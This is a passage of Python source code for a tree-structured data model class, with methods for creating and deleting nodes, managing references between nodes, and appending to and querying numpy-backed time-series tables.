if newNode["type"] == "object":
if "class" not in newNode:
newNode["class"]=None
if "autoReload" not in newNode:
newNode["autoReload"] = False # set this to true means: on a "instantiate object, we reload the module
self.__notify_observers(parentId,"children")
return newNode["id"]
def create_node_from_path(self,path,properties={"type":"variable"}):
"""
create a node from a path given, all intermediate nodes of the path that do not yet exist are also created as folder type
Args:
path(string): the path to the node to be created
properties(dict): the properties of the node
example:
create_node_from_path("root.myfolder.something.thisvar")
this will create myfolder as folder, something as folder, thisvar as variable and will also
set all hierarchies correctly
Returns:
(string) the nodeid created or
None if problem during creation
"""
currentNode = "root" #root
with self.lock:
for node in path.split('.')[1:-1]:
if not self.__get_id(currentNode+'.'+node):
#this one does not exist, so make it
self.create_node(currentNode,name=node)
currentNode += '.'+node
return self.create_node(parent=currentNode,name=path.split('.')[-1],properties=properties)
def create_nodes_from_template(self,parent="root",template=[]):
"""
deprecated!! this is the old style of templates as lists, now it's a dict
Create a node from a template; a template is a list of node-dicts,
Args:
parent(string): descriptor of the parent node under which the nodes of the template should be created
template: a list of node dicts of the nodes to be created, children are allowed as dicts
Returns:
(boolean) True for created, False for error
Example:
create_nodes_from_template(parent="root.myfolder",[{"name":"myvariable1","type":"variable"},
{"name":"myfolder","type":"folder","children":[
{"name":"mysubvar","type":"variable"}]])
"""
with self.lock:
parentId = self.get_id(parent)
if not parentId:
return False
newNodeIds = [] #these must be corrected later
for node in template:
#we take all info from the nodes and insert it into the tree
nodeName = node["name"]
newNodeId = self.create_node(parentId,name=nodeName,properties=node)
newNodeIds.append(newNodeId)
#do we have "children per template syntax"?, then remove that property from the nodes and make more nodes
if "children" in self.model[newNodeId]:
savedChildren = copy.deepcopy(self.model[newNodeId]["children"])
self.model[newNodeId]["children"]=[] # empty out
for child in savedChildren:
newChildId = self.create_node(newNodeId,name=child["name"],properties=child)
newNodeIds.append(newChildId)
#now correct missing stuff
for nodeId in newNodeIds:
if self.model[nodeId]["type"]== "referencer":
# convert the path of references into an id: get the parent path, add the tail, convert to id
forwardReferences =self.model[nodeId]["forwardRefs"] #make a copy, we'll delete this
self.model[nodeId]["forwardRefs"]=[]
parentPath = self.get_browse_path(self.model[nodeId]["parent"])
for forwardRef in forwardReferences:
forwardPath = parentPath+forwardRef
self.add_forward_refs(nodeId,[forwardPath])
return True
def __create_nodes_from_path_with_children(self,parentPath,nodes):
"""
recursive helper function for create_template_from_path
we build all nodes under the parentPath on this level and then the children
we return a list of all created node ids
"""
createdNodes = []
for node in nodes:
newModelNode = {}
for k, v in node.items():
if k not in ["children", "parent", "id", "browsePath"]: # avoid stupid things
newModelNode[k] = v
newId = self.create_node_from_path(parentPath+'.'+newModelNode["name"],newModelNode)
if newId:
createdNodes.append(newId)
if "children" in node:
createdNodes.extend(self.__create_nodes_from_path_with_children(parentPath+'.'+newModelNode["name"],node["children"]))
return createdNodes
def create_template_from_path(self,path,template):
"""
Create a template from a path given, the template contains one or more nodes
the path must not yet exist!
Args:
path(string): the path under which the template will be placed. the template always contains
a root node, this will be renamed according to the path
Returns:
(boolean) True for created, False for error
"""
with self.lock:
#first create the template root node
#we rename the template according to the path requested
template["name"]=path.split('.')[-1]
parentPath = '.'.join(path.split('.')[:-1])
newNodeIds = self.__create_nodes_from_path_with_children(parentPath,[template])
self.logger.debug(f"create_template_from_path, new nodeids: {newNodeIds}")
#now adjust the references of new nodes and of the ones that were there
for newNodeId in newNodeIds:
if "references" in self.model[newNodeId]:
#we must create forward references
for ref in self.model[newNodeId]["references"]:
# now there are two options:
# the given path is of the form templatename.levelone.leveltwo inside the template
# we replace the "templatename" with the path name the template was given
# or the path is absolute id or browsepath, then we don't modify
splitted = ref.split('.')
if len(splitted) == 1 or splitted[0]=="root":
targetPath = ref
else:
targetPath = parentPath+'.'+template['name']+'.'+'.'.join(ref.split('.')[1:])
self.add_forward_refs(newNodeId,[targetPath])
del self.model[newNodeId]["references"] # we remove the reference information from the template
def get_templates(self):
"""
give all templates loaded
Returns: a dict with entries containing the full templates
"""
with self.lock:
return copy.deepcopy(self.templates)
def add_forward_refs(self,referencerDesc,targets,allowDuplicates = True):
"""
adding forward references from a referencer to other nodes, the forward references are appended at the list
of forward references of the referencer node
references to oneself are not allowed
Args:
referencerDesc (string): descriptor of the referencer node from which we want to add forward references
targets (list(descriptors)): list of node descriptors to which we want to add forward refs
Returns:
True/False for success
"""
with self.lock:
fromId = self.get_id(referencerDesc)
if not fromId:
self.logger.error("can't set forward ref on "+str(referencerDesc))
return False
if type(targets) is not list:
targets = [targets]
if targets==[]:
return True
if not self.model[fromId]["type"]=="referencer":
self.logger.error("can't set forward ref on "+str(referencerDesc)+", it is not of type referencer but of type "+self.model[fromId]["type"])
return False
for target in targets:
toId = self.get_id(target)
if not toId:
continue
if toId == fromId:
continue
if not allowDuplicates:
if toId in self.model[fromId]["forwardRefs"]:
continue # ignore this forwards ref, we have it already
self.model[toId]["backRefs"].append(fromId)
self.model[fromId]["forwardRefs"].append(toId)
self.__notify_observers(fromId,"forwardRefs")
return True
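# Usage (illustrative, paths are hypothetical):
#   model.add_forward_refs("root.views.selection", ["root.data.var1", "root.data.var2"])
# creates forwardRefs on the referencer and matching backRefs on both targets;
# with allowDuplicates=False an already referenced target is silently skipped.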
def lock_model(self):
self.lock.acquire()
def release_model(self):
self.lock.release()
def get_model(self):
"""
Returns: the full deepcopy of the internal model object (a dict of node dictionaries)
"""
with self.lock:
#also add the browsepath to all nodes
for nodeid in self.model:
self.model[nodeid]["browsePath"]=self.get_browse_path(nodeid)
return copy.deepcopy(self.model)
def get_model_for_web(self,getHash=False):
"""
Returns: the full deepcopy of the internal model object (a dict of node dictionaries)
but leaving out the column values (this can be a lot of data)
and the file values (files are binary or strings with big size, typically serialized ML-models)
for files and columns, we either return a string "len 12344" or a sha1 hash value 133344
"""
model = {}
p=utils.Profiling("get_model_for_web")
with self.lock:
for nodeId, nodeDict in self.model.items():
if nodeDict["type"] in ["column","file","timeseries","eventseries"]:
# with columns we filter out the values
node = {}
for nk, nv in nodeDict.items():
if nk == "value":
try:
if not getHash:
node[nk] = "len " + str(len(nv))
else:
start = datetime.datetime.now()
hash = hashlib.sha1(nv.tobytes())
node[nk] = hash.hexdigest()
self.logger.debug(f"hashed {nodeDict['name']} in {(datetime.datetime.now()-start).total_seconds()} hash:{node[nk]}")
except:
node[nk] = "None"
else:
node[nk] = copy.deepcopy(nv) # values can be list, dict and deeper objects
model[nodeId] = node
elif nodeDict["type"]=="object":
node={k:v for k,v in nodeDict.items() if k!="object"}
model[nodeId]=node
else:
#this node is not a colum, can still hold huge data
model[nodeId] = copy.deepcopy(nodeDict) # values can be list, dict and deeper objects nodeDict
model[nodeId]["browsePath"] = self.get_browse_path(nodeId) #also add the browsepath
self.logger.debug(f"{p}")
return model
def remove_forward_refs(self,sourceDesc,targetDescriptors = [], deleteDuplicates=False):
"""
remove forward references from a referencer, this also removes the backreference from the target
Args:
sourceDesc: the descriptor of the referencer node
targetDescriptors: a list of descriptors, if missing we delete all forward references
deleteDuplicates: if set true, we delete all references to a target if we have more than one reference
Returns:
True/False for success
"""
with self.lock:
fromId = self.get_id(sourceDesc)
if not fromId:
return False
if not self.model[fromId]["type"] == "referencer":
return False # only for referencers
if targetDescriptors == []:
targets = self.model[fromId]["forwardRefs"].copy()
else:
targets = self.get_id(targetDescriptors)
if targets == []:
return True# nothing to do
for toId in targets:
if not toId:
continue # we skip Nones coming from the get_id
if deleteDuplicates:
# maybe multiple entries
while toId in self.model[fromId]["forwardRefs"]: # maybe multiple entries
self.model[fromId]["forwardRefs"].remove(toId)
self.model[toId]["backRefs"].remove(fromId)
else:
# we delete only one entry
self.model[fromId]["forwardRefs"].remove(toId)
self.model[toId]["backRefs"].remove(fromId)
self.__notify_observers(fromId,"forwardRefs")
return True
def remove_forward_ref(self,sourceDesc,targetDesc):
"""
remove a forward reference from a referencer, this also removes the backreference from the target
Args:
sourceDesc: the descriptor of the referencer node
Returns:
True/False for success
"""
with self.lock:
fromId = self.get_id(sourceDesc)
toId = self.get_id(targetDesc)
if not fromId or not toId:
return False
if not self.model[fromId]["type"]=="referencer":
return False # only for referencers
try:
self.model[fromId]["forwardRefs"].remove(toId)
self.model[toId]["backRefs"].remove(fromId)
self.__notify_observers(fromId, "forwardRefs")
return True
except:
return False
def remove_back_ref(self,sourceDesc,targetDesc):
"""
remove a backwards reference from any node to a referencer, this also removes the forward reference from the target
actually, this function is just a helper. Normally, we only talk about "forward references";
each forward reference also creates a backwards reference in the model, but this is just for internal look up speed
the reference here is targetDesc -> (forwardRef) -> sourceDesc
Args:
sourceDesc: the descriptor of the node that holds a backwards reference
targetDesc: the descriptor of the node that holds the forward reference
Returns:
True/False for success
"""
with self.lock:
return self.remove_forward_ref(targetDesc,sourceDesc)
def add_property(self,nodeDesc,property,value):
"""
add an arbitrary property entry for a node; a node is a key-value store, a property is a key with a value
Args:
nodeDesc: the descriptor of the node
property: the key to be created on the node
value: the value to be stored for this property
Returns:
True for create
False for node not found or if the property already exists
"""
with self.lock:
id = self.get_id(nodeDesc)
if not id:
return False
if property in self.model[id]:
return False # have this property already
self.model[id][property]=value
self.__notify_observers(id, property)
return True
def set_properties(self,properties={},nodeDesc=None):
"""
changes an arbitrary set of properties given by the dict or adds them if they do not exist yet; some properties are not allowed here:
children, parent, forward and backward refs; all others are allowed including type, name, value
Args:
nodeDesc: the descriptor of the node, is optional, can also be given as browsePath or id in the properties dict
properties: the new properties or changed
Returns:
True for done
False for node not found
"""
with self.lock:
if nodeDesc:
id = self.get_id(nodeDesc)
elif "id" in properties:
id = properties["id"]
elif "browsePath" in properties:
id = self.get_id(properties["browsePath"])
else:
self.logger.error("set properties is missing id ")
return False
if not id:
return False
notificationProperties = []
for k,v in properties.items():
if k in ["id","browsePath","children","parent","forwardRefs","backRefs"]:
continue # we ignore these entries
self.model[id][k]=v # overwrite or set new
notificationProperties.append(k)
self.__notify_observers(id,notificationProperties)
return True
def find_all_children_recursive(self,nodeIds):
""" find all children recursively; takes a list of node ids and returns a list containing these ids and all their recursive children """
with self.lock:
children = []
for id in nodeIds:
if self.model[id]["children"]:
children.extend(self.find_all_children_recursive(self.model[id]["children"]))
children.append(id)
return children
#delete node and all subnodes
def delete_node(self,desc):
"""
delete a node and all its recursive children;
flow:
1) make a list of all nodes to be deleted
2) rip off all references to/from the deleted nodes
3) delete all nodes
4) notify observers about the children change on the remaining parents of the deleted nodes
desc(string): the descriptor of the node
Returns:
True for success
False for node not found
"""
with self.lock:
id = self.get_id(desc)
if not id:
return False
nodesToDelete = self.find_all_children_recursive([id])
self.logger.debug(f"delete nodes {nodesToDelete}")
childNotify = []
#first rip off all references
for id in nodesToDelete:
forwards = self.model[id]["forwardRefs"].copy()
backwards = self.model[id]["backRefs"].copy()
for forward in forwards:
self.remove_forward_ref(id,forward) # this will also trigger observers
for backward in backwards:
self.remove_back_ref(id,backward) # this will also trigger observers
#now delete the actual nodes
for id in nodesToDelete:
parentId = self.model[id]["parent"]
if parentId in self.model:
self.model[parentId]["children"].remove(id)
childNotify.append(parentId)
if self.model[id]["type"]=="timeseries":
self.time_series_delete(id)
del self.model[id]
#now notify only those who still exist
goodNotify=[]
for id in childNotify:
if id in self.model:
goodNotify.append(id)
if goodNotify:
self.__notify_observers(goodNotify, "children") # make ONE call for the observers
return True
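# Usage sketch (hypothetical): deleting a branch removes the node, all recursive children and
# all references from/to them, then fires one "children" notification for the surviving parents.
#   m.delete_node("root.folderA")   # -> True if the node existed, False otherwise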
# if desc.type is a var or function then we just set the value
# if it's a "timeseries" then we set a column in a table, padded if needed
def set_value(self,desc,value):
"""
set the value property of a node, if the node does not have a value property yet, it is created here
Args:
desc(string): node descriptor
value (any): any value to be stored
"""
with self.lock:
id = self.get_id(desc)
if not id: return None
#convert if table:
if self.model[id]["type"] == "column":
value = numpy.asarray(value,dtype=numpy.float64)
self.model[id]["value"] = value
self.__notify_observers(id,"value")
return True
def get_value(self,desc):
"""
read out the "value" property of a node
Args:
desc(string): the node that holds the value
Returns:
the value
None if the node has no "value" property
"""
with self.lock:
id = self.get_id(desc)
if not id: return None
if self.model[id]["type"] == "timeseries":
values = self.time_series_get_table(id)
if values:
return values[id]["values"]
else:
return None
if "value" in self.model[id]:
return copy.deepcopy(self.model[id]["value"])
else:
return None
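# Usage sketch (hypothetical): set_value/get_value operate on the "value" property; for nodes
# of type "column" the value is converted to a float64 numpy array, for "timeseries" nodes
# get_value returns the values stored in the time series table.
#   m.set_value("root.sensor1", [1.0, 2.0, 3.0])
#   vals = m.get_value("root.sensor1")   # deep copy of the stored value, or None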
def __copy_node(self,id,resolveChildren=False):
"""
get a copy of a node, we don't create a node in the model here!
copy node with all properties, if the node is a "column", we don't copy the value
if the resolveChildren is set to true, we also copy the direct children
the copied node can't be used to create a node, as it is the copy of an existing node!
Args:
id (string): the node id to be copied
resolveChildren (bool): False to not copy the children (the new node has no children)
True to copy-create also the children
Return:
(dict) the node
"""
newNode = {}
for key in self.model[id]:
if key == "value" and self.model[id]["type"]in ["column","file","timeseries"]:
newNode["value"]=None
elif key == "children" and resolveChildren:
#we also copy the children
newNode["children"]=[]
for childId in self.model[id]["children"]:
childNode = self.__copy_node(childId)
newNode["children"].append(childNode)
else:
newNode[key]=copy.deepcopy(self.model[id][key])
return newNode
def __get_targets(self,id):
"""
#this is a recursive helper function for the get_leaves function
"""
targets=[]
if self.model[id]["type"] == "referencer":
for targetId in self.model[id]["forwardRefs"]:
targets.extend(self.__get_targets(targetId))
elif self.model[id]["type"] == "folder":
for targetId in self.model[id]["children"]:
targets.extend(self.__get_targets(targetId))
else:
addNode = self.__copy_node(id,resolveChildren=True)
addNode["browsePath"]=self.get_browse_path(id)
targets = [addNode]
return targets
def get_leaves_ids(self,desc):
"""
get the list of ids of the leaves, see get_leaves()
Returns:
a list of ids of the leaves
"""
leaves = self.get_leaves(desc) # a list of node dicts
leaveIds = []
for leave in leaves:
leaveIds.append(leave["id"])
return leaveIds
def get_leaves(self,desc,allowDuplicates=False):
"""
this function returns a list of dicts containing the leaves where this referencer points to
this functions works only for nodes of type "referencer", as we are following the forward references
leaves are defined as follows:
1) all nodes that are listed under the forward references and which are not of type referencer or folder
2) if nodes pointed to are referencer, the targets are again analyzed
3) if a node pointed to is a folder, all children of the folder are taken which are not referencer or folder themselves
folders and referencers inside the folder are not taken into account
doing so, hierarchies of referencers are unlimited, hierarchies of folders are only of depth 1
Returns:
all node dicts which are considered leaves as a list of node dicts
"""
with self.lock:
id = self.__get_id(desc)
if not id:return None
targets=self.__get_targets(id)
if targets and targets[0]["id"] == id:
#this can happen if the node is not a folder or referencer and has no children
targets.pop(0)
#before we return, we remove duplicates if wanted
if targets and allowDuplicates == False:
reducedTargets = []
ids = []
for t in targets:
if t["id"] in ids:
continue
reducedTargets.append(t)
ids.append(t["id"])
return reducedTargets
else:
return targets
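# Usage sketch (hypothetical) of the leaves algorithm described above; assumes a referencer
# "root.widget.selectedVariables" pointing to folders and/or further referencers.
#   leafDicts = m.get_leaves("root.widget.selectedVariables")       # list of node dicts
#   leafIds   = m.get_leaves_ids("root.widget.selectedVariables")   # only their ids
# duplicates are removed unless allowDuplicates=True is passed.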
def __get_referencer_parents(self,ids):
backRefs = []
#we look back from this node
for id in ids:
if self.model[id]["type"] == "referencer":
#we take this one in
backRefs.append(id)
#plus we look further up
thisBackRefs = self.model[id]["backRefs"]
if thisBackRefs:
backRefs.extend(self.__get_referencer_parents(thisBackRefs))
return backRefs
def get_referencers_old(self,desc):
"""
find the referencers pointing to a node via the "leaves algorithm"
initially, we take the parent and the backref referencers
Args:
deep: we support the reverse leave-algorithms including any depth of children level after the last referencer,
e.g. a leaves-path of referencer -> referencer -> nodes -> child ->child is a valid match
"""
with self.lock:
id = self.__get_id(desc)
if not id:return None
ids = [self.model[id]["parent"],id]
if "0" in ids:
ids.remove("0")
referencers = self.__get_referencer_parents(ids)
return referencers
def get_referencers(self,desc,deepLevel = 1):
"""
find the referencers pointing to a node via the "leaves algorithm"
initially, we take the parent and the backref referencers
Args:
deepLevel: we support the reverse leaves algorithm including any depth of children levels after the last referencer,
e.g. a leaves-path of referencer -> referencer -> node -> child -> child is a valid match
we give the number of parent levels to include in the search at the leaves
default is 1, so the node itself and its parent
"""
with self.lock:
id = self.__get_id(desc)
if not id:return None
if not deepLevel:
ids = [self.model[id]["parent"],id]
else:
ids = self._get_parents(id,deepLevel)
if "0" in ids:
ids.remove("0")
referencers = self.__get_referencer_parents(ids)
return referencers
def _get_parents(self,id,deepLevel = -1):
ids = []
while id != "1" and deepLevel >= 0:
ids.append(id)
deepLevel -=1
id = self.model[id]["parent"]
return ids
#get a table with values like in the table stored, start and end times are optional
# if start, end not given, then we get the full table with no postprocessing at all
def get_timeseries_table_old(self,variables,startTime=None,endTime=None,noBins=None,agg="sample",includeTimeStamps=None,includeBackGround=None):
with self.lock:
variables = self.get_id(variables)
return self.timeSeriesTables.get_value_table(variables, startTime=startTime, endTime=endTime, noBins=noBins,
agg=agg,
includeTimeStamps=includeTimeStamps) # ,startTime,endTime)
'''
if startTime == None and endTime ==None:
#request the full table
variables = self.get_id(variables) # convert all to ids
return self.timeSeriesTables.get_value_table(variables,startTime=startTime,endTime=endTime,noBins=noBins,agg=agg,includeTimeStamps=includeTimeStamps)#,startTime,endTime)
else:
# this is a more details request, we will try to deliver the data in bins and with
# aggretation postprocessing
variables = self.get_id(variables) # convert all to ids, not browsepath
return self.timeSeriesTables.get_value_table(variables,startTime,endTime,noBins,agg,includeTimeStamps=includeTimeStamps)
'''
#used in the Node class, give a column variable or the table itself, return the nodeid of the time variable of that table
def find_table_time_node(self,desc):
with self.lock:
table = self.__find_table(self.get_id(desc))
if not table:
return None
pathToTimeIndex = self.get_browse_path(table)+".timeField"
timeColumnId = self.get_leaves(pathToTimeIndex)[0]['id'] # this referencer must point to only one node
return timeColumnId
def find_table_node(self,desc):
"""
get the node id of a table giving a column node of the table as input
Args
desc[string]: a node descriptor of a column node belonging to the table
Returns:
the node id of the table node
"""
with self.lock:
return self.__find_table(desc)
def get_child(self,desc,childName):
"""
get a child based on the name given
Args:
desc: node descriptor of the node under which we look for children
childName: the child name to look for
Returns:
a node id if we find a child named childName under desc, or None if not found
"""
with self.lock:
nodeInfo = self.get_node_info(desc)
if nodeInfo:
for childId in nodeInfo['children']:
childInfo = self.get_node_info(childId)
if childInfo["name"] == childName:
return childId
return None
def get_children_dict(self,desc):
"""
create a dictionary with key= childName and value = nodedict
Args:
desc: the nodedescriptor
Returns:
a dict
"""
with self.lock:
childrenDic={}
id = self.get_id(desc)
if not id:
return None
for childId in self.model[id]["children"]:
child = self.get_node_info(childId)
childrenDic[child["name"]]=child
return childrenDic
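# Usage sketch (hypothetical): resolve direct children by name.
#   controlId = m.get_child("root.myFunction", "control")   # node id or None
#   children  = m.get_children_dict("root.myFunction")      # {"control": {...}, ...} or None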
def get_table_len(self,desc):
"""
get the current length of a table
Args:
desc: the node descriptor of type table
Returns:
the current length of the columns of the table, none if error
"""
with self.lock:
tableId = self.get_id(desc)
if not tableId: return None
if not self.model[tableId]["type"]=="table": return None
try:
columnid = self.get_child(tableId,"columns")
if not columnid: return None
columnIds = self.get_leaves_ids(columnid)
if columnIds:
return len(self.model[columnIds[0]]["value"])
except:
return None
def get_timeseries_table(self,variables,startTime=None,endTime=None,noBins=None,agg="sample",includeTimeStamps=None,format="array",includeBackGround=None):
"""
get a time series table from variables. The table is returned as a list of lists (format="array") or as a dict (format="dict")
all variables requested must be of type "column" and must belong to the same table:
all columns requested here must have a direct backreference to the same node of type "columns"
todo: also allow "columns" to point to folders or multiple hierarchies of referencing/folders
Args:
variables (list(nodedescriptors)): nodes to be part of the data table requested (ordered!)
startTime, endTime: the start and end time of the table given as seconds since epoch
#we also allow the special case of endTime = 0 and startTime = -interval
# we also allow the special case of startTime given and endTime = 0
noBins(int): the number of samples to be returned inside the table between start and end time,
if None is given, we return all samples (rows) we have in the table and do not aggregate
agg(string): the aggregation function to be used when we downsample the data,
"sample": this means we just pick out values (we sample) from the data set, this is actually not an aggregation
includeTimeStamps (bool): currently ignored
includeBackGround (bool): currently ignored
Returns(dict)
key : value
"__time" : list of timestamps for the returned table in epoch seconds
"variable1": the list of float values of one of the requested variables
"""
with self.lock:
#first check if all requested timeseries are columns from the same table
vars = self.get_id(variables)
table = []
for var in vars:
if self.model[var]["type"] != "column":
self.logger.warn("requested time series but not column type")
return False
table.append(self.__find_table(var))
if len(set(table)) != 1 or set(table)== {None}:
self.logger.warning("not the same table")
return False
#get the time field, and make fancy indexing via numpy arrays
pathToTimeIndex = self.get_browse_path(table[0])+".timeField"
timeColumnId = self.get_leaves(pathToTimeIndex)[0]['id']
if startTime and endTime:
times = numpy.asarray(self.model[timeColumnId]["value"])
indices = numpy.where((times>=startTime) & (times<=endTime))[0]
#xxx todo find the right index
elif startTime and not endTime:
#special cases for [-startTime:] and [startTime:] requests
if startTime < 0:
#this is the special case that we take an interval from the end
endTime = self.model[timeColumnId]["value"][-1]# the last
startTime = endTime +startTime # as startTime is negative this is actually a subtraction
else:
#starttime is positive
pass
times = numpy.asarray(self.model[timeColumnId]["value"])
indices = numpy.where(times >= startTime)[0]
else:
indices = numpy.arange(0,len(self.model[timeColumnId]["value"])) ## all indices
#now resample the indices to have the right bins number
if noBins:
varIndices = np.linspace(indices[0], indices[-1], noBins, endpoint=False, dtype=int)
else:
varIndices = indices
if format=="array":
result = []
for var in variables:
original = np.asarray(self.model[self.get_id(var)]["value"])[varIndices] # fancy indexing
data=original.tolist() # apply the selection with the indices list
result.append(data)
else:
result = {}
for var in variables:
original = np.asarray(self.model[self.get_id(var)]["value"])[varIndices] # fancy indexing
data = original.tolist() # apply the selection with the indices list
result[var]=data
result["__time"]=np.asarray(self.model[timeColumnId]["value"])[varIndices].tolist()
return result
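# Usage sketch (hypothetical): request the last hour of two columns of the same table,
# downsampled to 300 rows and returned as a dict keyed by the requested descriptors.
#   data = m.get_timeseries_table(["root.table.columns.temp", "root.table.columns.press"],
#                                 startTime=-3600, endTime=None, noBins=300, format="dict")
#   # data["__time"] holds the epoch timestamps, data[<descriptor>] the sampled values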
def add_timeseries(self,blob,fast=False):
"""
add a dictionary of variables to a table, we check if the variables belong to the same table
also, times that come in as datetime objects are converted to epoch seconds
Args:
blob (dict): a dictionary containing keys (node descriptors) and values (scalars)
Returns:
True/False for success
"""
with self.lock:
table = []
for key in blob:
id = self.get_id(key)
if not id:
self.logger.warn("add_timeseries count not find the variable:" + str(key))
return False
if self.model[id]["type"] != "column":
self.logger.warn("requested time series but not column type")
return False
table.append(self.__find_table(id))
if len(set(table)) != 1 or set(table) == {None}:
self.logger.warn("not the same table")
return False
#here, the request is parsed as ok, let's put the values
for key in blob:
id = self.get_id(key)
value = blob[key]
if type(self.model[id]["value"]) is not list:
self.model[id]["value"]=[]
#we auto-convert time stamps
if type(value) is datetime.datetime:
value = date2secs(value)
self.model[id]["value"].append(value)#finally put the value
#return the id of the table, give a column variable
def __find_table(self,desc):
"""
return the node id of the table, give a column variable
!! this has no lock, must be called under lock
Args:
desc(string): node descriptor of type column or the table itself
Returns:
the node id of the table to which the desc node belongs
"""
id = self.get_id(desc)
if not id: return False
if self.model[id]["type"] == "table":
return id
for ref in self.model[id]["backRefs"]:
if self.model[ref]["name"] == "columns":
return self.model[ref]["parent"]
return None
def ts_table_add_blob(self,dataBlob):
"""
this function adds a data blob to an existing table; it accepts multiple values at once to speed up internals
Args:
dataBlob (dict or list(dict)): containing key:value pair with key=a descriptor of a column of one table
value: a scalar or list or numpy array of values
"""
if type(dataBlob) is list:
self.logger.error("currently no support for list blobs")
return None
with self.lock:
#first find the table and decide for the type conversion
tableId = None
for key in dataBlob:
if key != '__time':
tableId = self.__find_table(key)
break
if not tableId:
self.logger.error("can't find the table of "+str(list(dataBlob.keys())[0]))
return False
tableNode =self.get_node(tableId)
columnsType = numpy.float64 # this is the default
# make sure the time is there and convert it: we accept datetime objects, iso strings or floats seconds
# plus, the key will be the time node id afterwards
timeNode = tableNode.get_child("timeField").get_leaves()[0]
#try to find the time entry in the dataBlob, rename it to the timenode id
timeKeyOptions = ['__time',timeNode.get_browse_path(),timeNode.get_id()]
for timeKeyOption in timeKeyOptions:
if timeKeyOption in dataBlob:
dataBlob[timeNode.get_id()] = dataBlob.pop(timeKeyOption) # from now on the time field is keyed by the time node id
break
if timeNode.get_id() not in dataBlob:
self.logger.error("time field entry missing")
return False
#now check if all are on the same table and convert the keys to node ids
variables = list(dataBlob.keys())
for var in variables:
if self.__find_table(var) != tableId:
self.logger.error("variables are not on the same table")
return False
id = self.get_id(var)
if id != var:
dataBlob[self.get_id(var)]=dataBlob.pop(var) # make new entry as nodeid
#now check the sizes of the incoming data and convert them to the requested type
inputSizes = set()
for key,value in dataBlob.items():
if key == timeNode.get_id():
#if we handle the time node, we might have to convert
if type(value) is list or type(value) is numpy.ndarray:
newValues = []
#newValues = numpy.asarray([],dtype=numpy.float64)
for val in value:
newValues.append(date2secs(val))
dataBlob[key] = numpy.asarray(newValues,dtype=numpy.float64) # write it back to the data
else:
#it is a scalar
dataBlob[key] = numpy.asarray([date2secs(value)],dtype=numpy.float64)
else:
if numpy.isscalar(dataBlob[key]):
dataBlob[key]=numpy.asarray([dataBlob[key]],dtype=columnsType) # make a list if it is scalar
else:
dataBlob[key]=numpy.asarray(dataBlob[key],dtype=columnsType) # if it is a numpy array already, numpy makes no copy
inputSizes.add(dataBlob[key].shape[0])
if len(inputSizes)!=1:
self.logger.error("incoming data has different lengths, can't handle as padding is unclear")
return False
# when we are here, we have converted all incoming data to numpy arrays, all belong to the same table
# and all have the same length, we are ready to put them inside
#print("through")
#now append them
return self.__ts_table_add_row(dataBlob,tableNodeId=tableId)
def __ts_table_add_row(self,dataBlob,tableNodeId=None,autoPad=True,pad=numpy.NaN):
"""
must be called under lock !!
this function accepts a dataBlob which is ready to be inserted, we don't make any more checks here
it must use variables from one table, it must contain data as numpy arrays
variables of the tables which are missing will be filled with pad if autoPad is true
"""
if not tableNodeId:
tableNode = self.get_node(self.__find_table(list(dataBlob.keys())[0]))
else:
tableNode = self.get_node(tableNodeId)
dataLen = dataBlob[list(dataBlob)[0]].shape[0]
columnNodes = tableNode.get_child("columns").get_leaves()
for columnNode in columnNodes:
id = columnNode.get_id()
if id in dataBlob:
#we add that one to the table
if type(self.model[id]['value']) != numpy.ndarray:
self.model[id]['value'] = dataBlob[id]
else:
self.model[id]['value'] = numpy.append(self.model[id]['value'],dataBlob[id])
else:
#we must pad
self.logger.debug(f"we are padding {id} with {dataLen} values")
if type(self.model[id]['value']) != numpy.ndarray:
self.model[id]['value'] = numpy.full(dataLen,numpy.nan)
else:
self.model[id]['value'] = numpy.append(self.model[id]['value'],numpy.full(dataLen,numpy.nan))
return True
def append_table(self,blob,autocreate=True,autopad=True, timeSorted = False):
"""
this function accepts a dictionary containing paths and values and adds them as a row to a table
if autopad is True: it is allowed to leave out columns, those will be padded with numpy.inf
if autocreate is True: it is allowed to add unknown columns, those will be added automatically under the given name
Args:
blob(dict):
keys: node descriptors,
values: value to be appended to the table (scalar or list per variable is allowed)
the times should be given in a variable ending with ".time"
if the table exists already and has another node for the time-values, then we take the .time values and put them on the time node
autocreate(bool): if set to true and the nodes or table in the dict do not exist yet, we autocreate a table
autopad(bool): if set to true, we automatically pad values in an existing table if variables of the table are not part of the blob
doing so, we keep a consistent length for all columns of a table
"""
#first check if we need to autocreate something, also check if we have multiple tables in play
with self.lock:
autocreates = []
tableId = None
columnsId = None
numberOfRows = None
for key in blob:
id = self.__get_id(key)
if not id:
if not autocreate:
self.logger.warn("appending table with unknown variables")
return None
else:
#we create this thing later
autocreates.append(key)
else:
#the id was found, let's find the right table
for ref in self.model[id]["backRefs"]:
if self.model[ref]["name"] == "columns":
#this is our table
if not tableId:
tableId = self.model[ref]["parent"]
columnsId = ref
numberOfRows = len(self.model[id]["value"])
else:
if tableId != self.model[ref]["parent"]:
self.logger.warn("mixed tables request")
return None
self.logger.debug("append table "+str(self.get_browse_path(tableId)))
if autocreates and autocreate:
#do we even have to create our table?
if not tableId:
#make a table structure based on the names given
tableName = autocreates[1].split('.')[1]+"_autotable"
tableId = self.create_node(parent="root",name=tableName,properties={"type":"table"})
columnsId = self.create_node(parent=tableId,name="columns",properties={"type":"referencer"})
timeId = self.create_node(parent=tableId, name="timeField", properties={"type": "referencer"})
numberOfRows=0
else:
#if we don't create the table, here is our timeId
timeReferencer = self.get_child(tableId, "timeField")
timeId = self.get_leaves_ids(timeReferencer)[0]
#we also then don't create any new time-field
autocreates = [path for path in autocreates if path[-5:]!=".time"]
self.logger.debug(f"table var autocreates: {autocreates}")
for path in autocreates:
id = self.create_node_from_path(path,properties={"type":"column"})
self.model[id]["value"]=numpy.full(numberOfRows,numpy.inf)
self.add_forward_refs(columnsId,[id])
if path.split('.')[-1]=="time":
#we just created the time field, we must also give the table struct the info
self.add_forward_refs(timeId,[id])
tableColumnIds = self.get_leaves_ids(columnsId) # a list of the ids of the columns
timeReferencer = self.get_child(tableId,"timeField")
timeId = self.get_leaves_ids(timeReferencer)[0]
timePath = None
for path in blob:
if path[-5:] == ".time":
timePath = path
if not timePath:
self.logger.error("no time path given")
return False
#now make arrays of all values
for k,v in blob.items():
if type(v) is list or type(v) is numpy.ndarray:
blob[k]=numpy.asarray(v,dtype=numpy.float64)
else:
blob[k] = numpy.asarray([v], dtype=numpy.float64)
valuesLen = len( blob[list(blob.keys())[0]] )
tableLen = len ( self.get_value(timeId))
if not timeSorted:
#just append
for path in blob:
if path.split('.')[-1]=="time":
id = timeId # we take the existing time Node of the table instead of just the variable named "time"
else:
id = self.get_id(path) # here
